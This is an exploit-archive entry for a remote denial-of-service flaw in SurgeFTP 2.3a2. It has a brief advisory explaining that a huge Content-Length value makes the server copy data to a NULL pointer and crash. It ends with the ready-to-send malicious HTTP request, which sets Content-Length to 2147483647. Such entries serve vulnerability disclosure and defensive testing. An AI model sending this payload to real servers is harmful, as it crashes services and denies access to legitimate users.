SurgeFTP 2.3a2 - Content-Length Null Pointer Denial of Service

2008-02-25T00:00:00
ID EXPLOITPACK:92EA5809DF4B2CA3F67C9FDBE85FD178
Type exploitpack
Reporter Luigi Auriemma
Modified 2008-02-25T00:00:00

Description

SurgeFTP 2.3a2 - Content-Length Null Pointer Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/27993/info

SurgeFTP is prone to a remote denial-of-service vulnerability because it fails to perform adequately boundary checks on user-supplied input.

Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.

SurgeFTP 2.3a2 is vulnerable; other versions may also be affected.

GET / HTTP/1.0
Content-Length: 2147483647

boom